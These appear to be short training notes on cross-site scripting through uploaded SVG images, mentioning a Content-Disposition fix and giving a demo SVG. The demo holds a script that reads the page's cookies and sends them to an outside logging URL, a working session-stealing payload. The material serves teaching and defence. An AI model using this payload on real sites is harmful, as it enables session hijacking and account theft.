Overview:
    -- Understanding XSS via SVG
    -- Demo



::  Understanding XSS via SVG  ::
--  Tool(s)  --

SVGs are XML based image files.
Scripts can be included in the file.




::  Demo  ::
--  Tool(s)  --


*** Fix again is setting content disposition header to be attachment.

<svg xmlns="http://www.w3.org/2000@/svg" >
<rect width="300" height="200" fill="#ddd"></rect>
<line x1="50" y1="100" x2="250" y2="160" stroke="blue" stroke-width="8" />

<script>
    var xhr = new XMLHttpRequest();
    xhr.open("GET", "https://hacking-web-applications.com/log.php?" +
                                        encodeURI(document.cookie) );
    xhr.send();
</script>
</svg>
